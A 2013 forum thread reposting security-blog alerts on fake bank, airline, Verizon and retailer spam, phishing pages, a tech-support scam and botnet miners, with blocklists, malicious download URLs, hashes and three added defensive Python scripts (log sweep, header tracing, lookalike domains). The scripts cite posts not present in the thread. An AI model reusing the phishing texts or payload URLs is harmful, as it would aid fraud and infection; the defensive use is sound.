Analysis date: 2013-07-14
___
Fake Bank of America SPAM / stid 36618-22.zip
- http://blog.dynamoo.com/2013/07/bank-of-america-spam-stid-36618-22zip.html
16 July 2013 - "This fake Bank of America spam comes with a malicious attachment:
Date: Tue, 16 Jul 2013 21:21:06 +0200 [15:21:06 EDT]
From: Joyce Bryson [legalsr @gmail .com]
Subject: Merchant Statement
Enclosed (pdflPDF|pdf file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech's or the Merchant's email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly...
Attached is a file called stid 36618-22.zip which in turn contains stid 36618-22.exe which is a variant of Zbot. VirusTotal detections are just 11/47*. Anubis reports** what appear to be several peer-to-peer connection attempts plus an attempted download from [donotclick]apsuart .com/741_out.exe that appears to fail..."
* https://www.virustotal.com/en/file/cb2ee3f181e015a25878d7250123118e5c35d8e8e595f8da3ce41a5c5cc8149f/analysis/1374010738/
** http://anubis.iseclab.org/?action=result&task_id=124ca4ff8eeb1c564515cb0db08870d32&format=html
:fear::fear::mad:
AplusWebMaster
2013-07-17, 18:15
FYI...
Fake Reservation Confirmation SPAM / marriott .com.reservation.lookup.viperlair .net
- http://blog.dynamoo.com/2013/07/houston-marriott-westchase-reservation.html
17 July 2013 - "This fake Marriott spam leads to malware on marriott.com.reservation.lookup.viperlair .net:
Date: Wed, 17 Jul 2013 05:12:22 -0800 [09:12:22 EDT]
From: Marriott Hotels & Resorts Reservation [reservations @clients.marriottmail .org]
Reply-To: reservations @clients.marriottmail .org
Subject: Houston Marriott Westchase Reservation Confirmation #86903601
Marriott Hotels & Resorts Houston Marriott Westchase 2900 Briarpark Dr.,
Houston, Texas 77042 USA Phone: 1-713-978-7400 Fax: 1-713-735-2726
Reservation for [redacted]
Confirmation Number: 86903601
Check-in: Sunday, July 21, 2013 (03:00 PM)
Check-out: Wednesday, July 24, 2013 (12:00 PM)
Modify or Cancel reservation ...
The -link- in the email goes through a legitimate -hacked- site and lands on [donotclick]marriott.com.reservation.lookup.viperlair .net/news/marriott-ebill-order-confirmation.php (report here*) hosted on the following IPs:
(viperlair .net is registered with -fake- WHOIS details that mark it out as belonging to the Amerika gang...)
50.97.253.162 (Softlayer, US)
59.126.142.186 (Chunghwa Telecom, Taiwan)
209.222.67.251 (Razor Inc, US)
Recommended blocklist:
50.97.253.162
59.126.142.186
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3804348
___
"PC Wizard" tech support SCAM
- http://blog.dynamoo.com/2013/07/02086-547426-pc-wizard-tech-support-scam.html
17 July 2013 - "Just a quick one.. some Indian scammers routing through a UK number 02086 547426 (02086547426) and purporting to be from a company "PC Wizard" just called and tried to convince me that something was wrong with my PC.
I'll do a write up later.. but in the mean time their MO is to get you to look at your Event Viewer for errors (there are always errors), and then visit ammyy .com to run some remote control software. DO NOT LET THEM DO THIS!"
- http://centralops.net/co/DomainDossier.aspx
canonical name ammyy.com
addresses 70.38.40.185
OriginAS: AS32613 *
City: Moscow ...
Country: RU ...
* https://www.google.com/safebrowsing/diagnostic?site=AS:32613
"... over the past 90 days, 1721 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-07-17, and the last time suspicious content was found was on 2013-07-17... we found 313 site(s) on this network... that appeared to function as intermediaries for the infection of 794 other site(s)... We found 280 site(s)... that infected 1790 other site(s)..."
:fear::mad:
AplusWebMaster
2013-07-18, 19:10
FYI...
Site primrose .co .uk hacked, emails compromised
- http://blog.dynamoo.com/2013/07/primrosecouk-hacked-emails-compromised.html
18 July 2013 - "Garden accessory primrose .co .uk has been -hacked- and email addresses stored in their system are being abused for phishing purposes:
From: paypal .co .uk [service @paypal .co .uk]
Date: 18 July 2013 11:01
Subject: We cannot process your payment at this time.
Dear,
We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ? It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.
Reference Number: PP-001-278-254-803
It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.
1. Download the attached document and open it in a browser window secure.
2. Confirm that you are the account holder and follow the instructions.
Yours sincerely,
PayPal
Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589
The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www. thesenddirect .com (62.149.142.113 - Aruba, Italy) and submitting the data to www .paypserv .com (62.149.142.152 - also Aruba). The WHOIS details are no doubt -fake- and are respectively:
Saunders, John Alan mahibarayanlol @gmail .com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455
----------
Clarke, Victoria johanjo1010 @gmail .com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064
Primrose .co .uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything. Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose .co .uk it is impossible to say if any financial data has been compromised."
___
Fake KLWines .com SPAM / prysmm .net
- http://blog.dynamoo.com/2013/07/k-wine-merchants-klwinescom-spam.html
18 July 2013 - "This fake K&L Wine Merchants spam email leads to malware on www. klwines.com.order.complete .prysmm.net:
Date: Thu, 18 Jul 2013 05:57:28 -0800
From: drowsedl04 @inbound.ups .net
Subject: Your K&L order #56920789 is complete
Hello from K&L Wine Merchants -- www. KLWines .com
Just wanted to let you know that your order (#56920789) is complete.
Additional comments for this order: Ship Fri. 7/19
The following items are included...
Item Subtotal: $247.91
Tax: $0.00
Shipping & Handling: $67.18
Total: $315.09
The tracking number for this shipment is 1Z474482A140261050.
Please visit the freight carrier's site for exact shipping pickup and dropoff dates, by clicking on the link below.
To see the latest information about your order, visit "My Account"...
The link in the email goes through a legitimate -hacked- site and ends up on a malware page at [donotclick]www.klwines.com.order.complete.prysmm .net/news/order-information.php (report here*) hosted on:
50.97.253.162 (Softlayer, US)
59.126.142.186 (Chunghwa Telecom, Taiwan)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
The -fake- WHOIS details mark this out as belonging to the Amerika gang...
Recommended blocklist:
50.97.253.162
59.126.142.186
203.236.232.42
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3833979
___
Fake QuickBooks Overdue Payment SPAM
- http://threattrack.tumblr.com/post/55778161657/quickbooks-overdue-payment-spam
July 18, 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/18/2013 as outlines under our “Payment Terms" agreement.
Thank you for your business,
Sincerely,
Nathan Phipps
Malicious URLs
prospexleads .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
picaletter .com/ZDpczi37.exe
s268400504.onlinehome .us/v73.exe
wineoutleteventspace .com/7UNFVh.exe
Malicious File Name and MD5:
invoice_<random>.zip (9E2221D918E83ED2B264214F5DDAB9FF)
invoice_<random>.exe (06C3A27772C2552A28C32F82583B7645)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/058de12167fb84c0e44eaa0653226d71/tumblr_inline_mq4vwydiSE1qz4rgp.png
___
Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/55794599243/wells-fargo-important-documents-spam
July 18, 2013 - "Subjects Seen:
IMPORTANT Documents - WellsFargo
Typical e-mail details:
Please review attached files.
Alyce_Granger
Wells Fargo Advisors
Malicious URLs
prospexleads .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
ciclografico .pt/9Up.exe
mdebra.o2switch .net/2ccVsM9z.exe
magusdev .com/YSQsWZVU.exe
splendidhonda .com/Hb3qCt.exe
Malicious File Name and MD5:
DOC_<name>.zip (44A3AFFC21D0BA3E4CA5ACE0732C6D65)
DOC_{_MAILTO_USERNAME}.exe (4A182976242CF4F65B6F219D649B0A98)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/49c85c41891dfc78034a28e9a6a6b164/tumblr_inline_mq58ozzlo31qz4rgp.png
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Video Sharing Email Messages - 2013 Jul 18
Fake Product Order Quotation Email Messages - 2013 Jul 18
Malicious Attachment Email Messages - 2013 Jul 18
Email Messages with Malicious Attachments - 2013 Jul 18
Fake Money Transfer Notification Email Messages - 2013 Jul 18
Fake Product Supply Request Email Messages - 2013 Jul 18
Malicious Personal Pictures Attachment Email Messages - 2013 Jul 18
Malicious Attachment Email Messages - 2013 Jul 18
Fake Money Transfer Notification Email Messages - 2013 Jul 18
Fake Invoice Statement Attachment Email Messages - 2013 Jul 18
Fake Customer Complaint Attachment Email Messages - 2013 Jul 18
Fake Picture Link Email Messages - 2013 Jul 18
Fake Fund Transfer Confirmation Email Messages - 2013 Jul 18
Fake Order Information Email Messages - 2013 Jul 18
Fake Tax Report Documentation Email Messages - 2013 Jul 18
Fake Product Quote Request Email Messages - 2013 Jul 18
Fake Product Quotation Request Email Messages - 2013 Jul 18
(More detail and links at the cisco URL above.)
:fear::fear: :mad:
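The three ThreatTrack posts above (Dun & Bradstreet, QuickBooks, Wells Fargo) all list the same kind of infrastructure: a Pony loader check-in at `/ponyb/gate.php` plus a handful of `.exe` payload URLs. The sweep below is an added example, not code from those posts: it loads their URLs as indicators, runs them over a constructed, simplified proxy log (`timestamp client method url status`), and adds two generic rules of this example's own (a POST to any `gate.php`, and a short randomly named `.exe` fetched from a site root) that the posts do not state.

```python
"""Proxy-log sweep for the Pony loader indicators listed in the posts above.

Added example, not code from the ThreatTrack posts. The indicator list is
copied from the Dun & Bradstreet, QuickBooks and Wells Fargo posts (the
/ponyb/gate.php check-ins and the .exe payload URLs). The log lines are a
constructed, simplified format "timestamp client method url status", and the
two generic rules (a POST to any gate.php, a short randomly named .exe fetched
from a site root) are this example's own heuristics, not something the posts
assert.
"""
import re
from urllib.parse import urlsplit

IOC_URLS = [
    "b-markenergy.com/ponyb/gate.php",
    "arizonaenergysuppliers.com/ponyb/gate.php",
    "alabamaenergysuppliers.com/ponyb/gate.php",
    "bemarkenergy.com/ponyb/gate.php",
    "costruzionimediterraneo.it/FP0gd6.exe",
    "preview.vibration-trainers.com/V2YE.exe",
    "prospexleads.com:8080/ponyb/gate.php",
    "phonebillssuck.com:8080/ponyb/gate.php",
    "picaletter.com/ZDpczi37.exe",
    "s268400504.onlinehome.us/v73.exe",
    "wineoutleteventspace.com/7UNFVh.exe",
    "ciclografico.pt/9Up.exe",
    "mdebra.o2switch.net/2ccVsM9z.exe",
    "magusdev.com/YSQsWZVU.exe",
    "splendidhonda.com/Hb3qCt.exe",
]

# Constructed proxy lines for the demo: two hits on listed IOCs, a clean
# request, a generic gate.php check-in on an unlisted host, and a legitimate
# installer download that the root-level .exe rule must not flag.
SAMPLE_LOG = """\
2013-07-18T14:02:11 10.1.2.33 GET http://picaletter.com/ZDpczi37.exe 200
2013-07-18T14:02:19 10.1.2.33 POST http://prospexleads.com:8080/ponyb/gate.php 200
2013-07-18T14:03:40 10.1.2.57 GET http://www.example.org/index.html 200
2013-07-18T14:05:02 10.1.2.57 POST http://cdn.example.net/api/gate.php 404
2013-07-18T14:06:55 10.1.2.90 GET http://dl.example.com/downloads/setup.exe 200
""".splitlines()

RANDOM_EXE = re.compile(r"^/[A-Za-z0-9]{2,10}\.exe$")


def normalise(url):
    """Reduce a URL to host[:port]/path: lower-cased netloc, no scheme, no query."""
    if "://" not in url:
        url = "http://" + url
    p = urlsplit(url)
    return p.netloc.lower() + p.path


IOC_SET = {normalise(u) for u in IOC_URLS}
IOC_HOSTS = {n.split("/", 1)[0].split(":")[0] for n in IOC_SET}


def classify(method, url):
    """Return the reasons a request is suspicious (empty list if none)."""
    n = normalise(url)
    netloc, _, rest = n.partition("/")
    host = netloc.split(":")[0]
    path = "/" + rest
    reasons = []
    if n in IOC_SET:
        reasons.append("exact IOC match")
    elif host in IOC_HOSTS:
        reasons.append("known bad host")
    if method.upper() == "POST" and path.endswith("/gate.php"):
        reasons.append("POST to gate.php (Pony check-in pattern)")
    if "/ponyb/" in path:
        reasons.append("/ponyb/ path")
    if method.upper() == "GET" and RANDOM_EXE.match(path):
        reasons.append("short random-named .exe at site root")
    return reasons


def sweep(lines):
    """Parse log lines and return [(client, url, reasons)] for every hit."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue                      # malformed line, skip it
        _, client, method, url, _ = fields
        reasons = classify(method, url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


def checkin_clients(hits):
    """Clients that posted to a gate.php: the hosts to pull for triage first."""
    return sorted({c for c, _, r in hits if any("gate.php" in x for x in r)})


if __name__ == "__main__":
    for client, url, reasons in sweep(SAMPLE_LOG):
        print(client, url, "; ".join(reasons))
    print("triage:", checkin_clients(sweep(SAMPLE_LOG)))
```

The exact-match rule is the only one with no false positives; the `gate.php` and root-level `.exe` heuristics are there to catch the next domain the same kit moves to, and the fourth sample line shows they will also fire on unrelated sites, so treat them as leads for triage rather than block decisions.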
AplusWebMaster
2013-07-19, 18:02
FYI...
Who's Who SCAM
whoswhonetworkonline .com
- http://blog.dynamoo.com/2013/07/whoswhonetworkonlinecom-spam.html
19 July 2013 - "This turd of an email was sent to an info@ email address on a domain I own. It appears to be a classic Who's Who scam*.
* https://en.wikipedia.org/wiki/Who%27s_Who_scam
From: Who's Who [cpm2 @contactwhoswho .us]
Reply-To: databaseemailergroup @gmail .com
date: 19 July 2013 05:44
subject: You were recently nominated into Who's Who Amoung Executives
Who's Who Network Online
Hello,
As you are probably aware, in the last few weeks, we at the Who's Who Among Executives and Proefssionals have reached out to several hundred individuals for placement in our upcoming 2013 edition of our directory. You were contacted, but we did not receive any of your biographical information. We would like to give you another opportunity to do so...
Clicking on the link takes you to whoswhonetworkonline .com hosted on 66.11.129.87 (Stafford Associates Computer Specialists Inc., New York). The WHOIS details are hidden.
Screenshot: https://lh3.ggpht.com/-LAZAcu9_sfE/Uek4VdMyPaI/AAAAAAAABhk/HXehA4zUiVw/s400/whoswhonetworkonline.png
There's no clue anywhere on the site or in the email about who is behind the spam. There is no corporation in New York with the exact name "Who's Who Network Online" although there are several similar sounding entities. However, there are some clues in the headers of the email that link it through to another recent and similarly-themed spam... The email originates from a Comcast IP address of 174.58.75.1 in West Florida, and then routes through a server at 192.217.104.157 (NTT America) which has the hostname contactwhoswho.us which is consistent with the cpm2 @contactwhoswho .us sender's address...
Darin Delia appears to be the same person who was sending out Spotlite Radio spam**..."
** http://blog.dynamoo.com/2013/04/spotlite-radio-spotliteradio2013com-spam.html
___
Bank of America Transaction Completed Spam
- http://threattrack.tumblr.com/post/55870699152/bank-of-america-transaction-completed-spam
19 July 2013 - "Subjects Seen:
Your transaction is completed
Typical e-mail details:
Transaction is completed. $99479350 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt on payment is attached.
Malicious File Name and MD5:
payment receipt(copy).zip (F87DB429BED542ED6D26ACF8924280FB)
payment receipt(copy).exe (22C694FDA2FF8BECC447D1BE198A74DC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e1bdaf55d55cd4cb9ddc658bac93e877/tumblr_inline_mq6s3eO0qX1qz4rgp.png
___
Fake Verizon Wireless "Data Usage Overage Alert" / verizonwirelessreports .com
- http://blog.dynamoo.com/2013/07/verizon-wireless-data-usage-overage.html
20 July 2013 - "This fake Verizon email leads to malware on the domain onemessage.verizonwireless.com.verizonwirelessreports .com:
Date: Fri, 19 Jul 2013 10:48:31 -0500 [11:48:31 EDT]
From: Verizon Wireless [VZWMail @e-marketing. verizonwireless-mail .net]
Subject: Data Usage Overage Alert
Important Information About Your Account. View Online
verizon wireless Explore Shop My Verizon Support
Important Information About Your Data Usage
Your account has used your data allowance for this month and you may now be billed overage charges. Your monthly data allowance will reset on the 20th.
Run an Account Analysis in My Verizon to analyze your recent months' data usage and review your plan options.
Don't forget, you can also manage your alert settings in My Verizon including adding recipients and opting out of specific alerts.
Thank you for choosing Verizon Wireless.
Details as of:
[redacted]
07/19/2013 02:15 AM EDT
We respect your privacy. Please review our privacy policy for more information
about click activity with Verizon Wireless and links included in this email.
This email was sent to [redacted];
ID: [redacted]
The -link- in the email goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]onemessage.verizonwireless.com.verizonwirelessreports .com/news/verizon-bill.php (report here*) hosted on:
172.255.106.126 (Nobis Technology Group, US / Creative Factory Beijing, China)
188.134.26.172 (Perspectiva Ltd, Russia)
The domain verizonwirelessreports .com is -fake- and was recently registered to an anonymous person. However, given the IPs and associated domains then this is clearly the work of this gang.
Blocklist:
172.255.106.126
188.134.26.172
verizonwirelessreports .com
firerice .com
onemessage.verizonwireless .com.verizonwirelessreports.com
package.ups.com.shanghaiherald .net
epackage.ups.com.shanghaiherald .net
vitans .net
www. klwines .com.order.complete.prysmm .net
prysmm .net
shanghaiherald .net"
* http://urlquery.net/report.php?id=3863421
:fear: :mad:
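The Who's Who post above traces the mail by its headers: it originates at a Comcast address (174.58.75.1) and passes through a relay at 192.217.104.157 whose hostname matches the sender domain. The walk below is an added example, not code from the Dynamoo post: it unfolds the `Received:` headers, reads them bottom-up into transit order, reports the earliest public IP as the likely origin, and checks that each relay's `by` name agrees with what the next relay says it received from. The header block is constructed for this example from those two addresses and that hostname; the receiving-side hosts, queue IDs, timestamps and the Comcast reverse name are invented, and the real message's headers are not reproduced in the post.

```python
"""Received-header chain walk.

Added example, not code from the Dynamoo post above. The headers below are
constructed from the two IPs and the hostname the post names; everything else
in them (receiving hosts, IDs, timestamps, the reverse DNS name) is invented.
"""
import ipaddress
import re

SAMPLE_HEADERS = """\
Received: from mx.example.org (mx.example.org [10.0.0.5])
    by mail.example.org with ESMTP id abc123; Fri, 19 Jul 2013 05:44:10 +0000
Received: from contactwhoswho.us (contactwhoswho.us [192.217.104.157])
    by mx.example.org with ESMTP id def456; Fri, 19 Jul 2013 05:44:09 +0000
Received: from [192.168.1.10] (c-174-58-75-1.hsd1.fl.comcast.net [174.58.75.1])
    by contactwhoswho.us with ESMTPA id ghi789; Fri, 19 Jul 2013 05:44:01 +0000
From: Who's Who <cpm2@contactwhoswho.us>
Subject: You were recently nominated into Who's Who
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HOP = re.compile(
    r"^Received:\s*from\s+(?P<from>\S+)(?:\s+\((?P<paren>[^)]*)\))?\s+by\s+(?P<by>\S+)",
    re.I,
)


def unfold(raw):
    """Join RFC 5322 continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def _is_public(ip):
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def received_hops(raw):
    """Hops in transit order (origin first). Each hop records the host the relay
    says it received from, the relay itself, and the first public IP in the
    'from' clause. That IP is written by the receiving relay, so it is the one
    part a sender cannot forge once the mail is past the first honest relay."""
    hops = []
    for line in unfold(raw):
        m = HOP.match(line)
        if not m:
            continue
        clause = m.group("from") + " " + (m.group("paren") or "")
        public = [ip for ip in IPV4.findall(clause) if _is_public(ip)]
        hops.append({
            "from": m.group("from").strip("[]"),
            "by": m.group("by"),
            "public_ip": public[0] if public else None,
        })
    hops.reverse()                # top-most header was added by the last relay
    return hops


def origin_ip(raw):
    """Earliest public IP in the chain: the best guess at the sending machine."""
    for hop in received_hops(raw):
        if hop["public_ip"]:
            return hop["public_ip"]
    return None


def chain_breaks(hops):
    """Pairs where a relay's 'by' name is not what the next relay says it
    received from. A break usually means the headers below it were forged."""
    return [(a["by"], b["from"]) for a, b in zip(hops, hops[1:])
            if a["by"].lower() != b["from"].lower()]


if __name__ == "__main__":
    chain = received_hops(SAMPLE_HEADERS)
    for hop in chain:
        print(hop["public_ip"] or "-", hop["from"], "->", hop["by"])
    print("origin:", origin_ip(SAMPLE_HEADERS), "breaks:", chain_breaks(chain))
```

Only the header written by your own server is fully trustworthy; anything a spammer's relay adds below it can be invented, which is why the chain is checked for consistency before the lowest IP is taken as the origin.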
AplusWebMaster
2013-07-20, 17:11
FYI...
Fake BBC website SPAM hits Twitter
- http://www.threattracksecurity.com/it-blog/fake-bbc-website-spam-hits-twitter/
July 19, 2013 - "There’s a spam-run doing the rounds right now which uses a -fake- BBC website to drive traffic to a diet pill website:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc1.jpg
... All of the posts use the hashtag “Amazing”, with a link to a fake BBC URL + 6 seemingly random numbers:
#amazing newslinkbbc(dot)co(dot)uk/??[6 digits]
The above URL was registered in August 2011. Additionally, there are more fake BBC sites located at mailbbc(dot)co(dot)uk (registered August 2011, on the same day as the URL currently being posted to Twitter) and securebbc(dot)co(dot)uk (registered August 2012). At least one other URL has been up for debate in years gone by in relation to the person claiming ownership of newslinkbbc and mailbbc. Clicking
newslinkbbc(dot)co(dot)uk takes end-users to world-bbc(dot)co(dot)uk (registered August 2012):
Fake BBC Spam site..
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc2.jpg
... The above site advertises a weightloss diet designed to remove belly fat. The live link on the site leads to bbchost(dot)altervista(dot)org/news/health-21434875/try-garcinia-now which -redirects- to
pgc(dot)my-secure-orders(dot)com/?clickid=
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc3.jpg
The site is promoting the formerly mentioned diet pills... We’ve seen 360+ of these links being spammed on Twitter... and no doubt the spam will continue to grow before Twitter gets a handle on the situation. For now, be very wary of any and all links being spammed with the #amazing hashtag, and if you find yourself spamming the same Tweets then change your password and remove any apps tied to your account that you don’t remember adding (or indeed, have added recently but don’t feel so confident about anymore)."
:fear: :mad:
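The ThreatTrack posts above show three ways a lookalike domain is built: a glyph swap ("rn" typed for "m" in stearnpowered.com), a transposition (wikipeida.org) and a brand name buried inside a longer label (newslinkbbc.co.uk, mailbbc.co.uk). The checker below is an added example, not code from those posts: it generates every single-edit imitation of a brand label, falls back to an edit-distance score, and flags embedded brand names. The brand list, the glyph catalogue, the tiny suffix table and the distance threshold are this example's own choices.

```python
"""Lookalike-domain checker.

Added example, not code from the ThreatTrack posts above. Brand list, glyph
catalogue, suffix table and the distance threshold are this example's choices.
"""

# Glyph pairs that look alike in a proportional font:
# (what the squatter registers, what the victim believes they are reading).
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"),
               ("1", "l"), ("i", "l"), ("l", "i"), ("0", "o")]

# Two-label public suffixes this example knows about. Real tooling should use
# the Public Suffix List; this set only has to cover the brands below.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "gov.uk"}

BRANDS = ["steampowered.com", "wikipedia.org", "bbc.co.uk"]


def split_host(host):
    """(registrable label, public suffix): store.stearnpowered.com -> ("stearnpowered", "com")."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return labels[-3], ".".join(labels[-2:])
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def single_edits(name):
    """Every label one typosquatting edit away from the brand label."""
    out = set()
    for typed, read in CONFUSABLES:                 # glyph swap at each occurrence
        i = name.find(read)
        while i != -1:
            out.add(name[:i] + typed + name[i + len(read):])
            i = name.find(read, i + 1)
    for i in range(len(name) - 1):                  # adjacent transposition
        out.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    for i in range(len(name)):                      # dropped character
        out.add(name[:i] + name[i + 1:])
    for i in range(len(name)):                      # doubled character
        out.add(name[:i] + name[i] + name[i:])
    out.discard(name)
    return out


def osa_distance(s, t):
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions."""
    d = [[0] * (len(t) + 1) for _ in range(len(s) + 1)]
    for i in range(len(s) + 1):
        d[i][0] = i
    for j in range(len(t) + 1):
        d[0][j] = j
    for i in range(1, len(s) + 1):
        for j in range(1, len(t) + 1):
            cost = 0 if s[i - 1] == t[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and s[i - 1] == t[j - 2] and s[i - 2] == t[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(s)][len(t)]


def classify(host, brands=BRANDS):
    """Return (brand, reason) when host looks like an imitation, else None."""
    label, suffix = split_host(host)
    for brand in brands:
        b_label, b_suffix = split_host(brand)
        if label == b_label:
            return None if suffix == b_suffix else (brand, "brand label on a different suffix")
        if label in single_edits(b_label):
            return brand, "single-edit lookalike"
        if len(b_label) >= 6 and osa_distance(label, b_label) <= 2:
            return brand, "within edit distance 2"
        if len(b_label) >= 3 and b_label in label:
            return brand, "brand name embedded in a longer label"
    return None


if __name__ == "__main__":
    for h in ["store.stearnpowered.com", "wikipeida.org", "newslinkbbc.co.uk",
              "mailbbc.co.uk", "store.steampowered.com"]:
        print(h, "->", classify(h))
```

The single-edit set is exact and cheap to precompute per brand, which makes it suitable for matching against passive DNS or new-registration feeds; the distance fallback catches two-edit variants at the cost of more noise, and the length guards stop three-letter brands from matching everything.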
AplusWebMaster
2013-07-21, 16:48
FYI...
Malicious URLs in .lc zone
- https://www.securelist.com/en/blog/9103/Malicious_URLs_in_lc_zone
July 20, 2013 - "While analyzing suspicious URLs I found out that more and more malicious URLs are coming from the .lc domain, which formally belongs to Saint Lucia*, a country located in the eastern Caribbean Sea. Our statistics confirm this trend.
> https://www.securelist.com/en/images/pictures/klblog/9106.png
Cybercriminals from different places of the world are actively using this domain, including cybercriminals from Brazil abusing free Web hosting available in that country.
> https://www.securelist.com/en/images/pictures/klblog/9104.jpg
How many legitimate domains at .lc zone have you ever had to visit in your life? If the answer is zero, so maybe it’s time to start filtering access to this domain, especially on the corporate Firewall / Proxy layer."
* https://en.wikipedia.org/wiki/Saint_Lucia
___
PlugX malware factory revisited... Smoaler
- http://atlas.arbor.net/briefs/index#-1265345240
High Severity
July 19, 2013
The Smoaler malware has been uncovered and is involved in targeted attacks. Organizations that may have been targeted would benefit from careful analysis of this information and associated indicators.
Analysis: Targeted attack campaigns continue as usual. As actors are discovered, their techniques, tactics and procedures evolve. While the technique of running malware in memory is not new, it is put into practice here, and the final payload varies. While many targeted attacks still involve only the amount of force necessary to compromise the target, many other attack campaigns that have yet to be unmasked are surely in operation.
Source: http://nakedsecurity.sophos.com/2013/07/15/the-plugx-malware-factory-revisited-introducing-smoaler/
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH) / MS12-027
Last revised: 03/07/2013
:fear: :mad:
AplusWebMaster
2013-07-22, 19:49
FYI...
Bitcoin mining tools in the wild...
- http://blog.webroot.com/2013/07/22/yet-another-commercially-available-stealth-bitcoinlitecoin-mining-tool-spotted-in-the-wild/
July 22, 2013 - "Cybercriminals continue releasing new, commercially available, stealth Bitcoin/Litecoin mining tools, empowering novice cybercriminals with the ability to start monetizing the malware-infected hosts part of their botnets, or the ones they have access to which they’ve purchased through a third-party malware-infected hosts selling service...
Sample screenshots of the stealth Bitcoin/Litecoin mining tool’s admin panel:
> https://webrootblog.files.wordpress.com/2013/07/stealth_bitcoin_litecoin_mining_tool.png
.
> https://webrootblog.files.wordpress.com/2013/07/stealth_bitcoin_litecoin_mining_tool_01.png
... the cybercriminal behind it released it in a way that would prevent its mass spreading, supposedly due to the fact that he doesn’t want to attract the attention of security vendors whose sensor networks would easily pick up any massive campaigns featuring the miner. Therefore, he’s currently offering a limited number of copies of this miner. Over the last couple of months we’ve been intercepting multiple subscription-based or DIY type of stealth Bitcoin/Litecoin miners, indicating that the international underground marketplace is busy responding to the demand for such type of tools. Despite the fact that Bitcoin is a ‘trendy’ E-currency, we believe that for the time being, Russian and Eastern European cybercrime gangs will continue to maintain a large market share of the underground’s market profitability metric, due to their utilization of mature, evasive, and efficient monetization tactics..."
Bitcoin Mining by Botnet...
- https://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/
July 18, 2013
___
Fake American Airlines SPAM / sai-uka-sai .com
- http://blog.dynamoo.com/2013/07/american-airlines-spam-sai-uka-saicom_22.html
22 July 2013 - "This fake American Airlines spam leads to malware on www .aa .com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai .com:
From: American.Airlines@aa .net
Date: 22 July 2013 17:22
Subject: AA.com Itinerary Summary On Hold
Dear customer,
Thank you for making your travel arrangements on AA.com! Your requested itinerary is now ON HOLD. Details below.
To ensure that your reservation is not canceled you must complete the purchase of this reservation by clicking the “Purchase” button on this email, or by using the “View/Change Reservations” section on www .aa .com.
This reservation is on HOLD until July 22, 2013 11:59 PM CDT (Central Daylight Time) ...
The link in the email goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai .com/news/american-airlines-hold.php (report here*) hosted on the following IPs:
50.97.253.162 (Softlayer, US**)
95.111.32.249 (Megalan / Mobitel EAD, Bulgaria)
188.134.26.172 (Perspectiva Ltd, Russia)
209.222.67.251 (Razor Inc, US)
The WHOIS details for that domain are the characteristically -fake- ones...
Recommended blocklist:
50.97.253.162
95.111.32.249
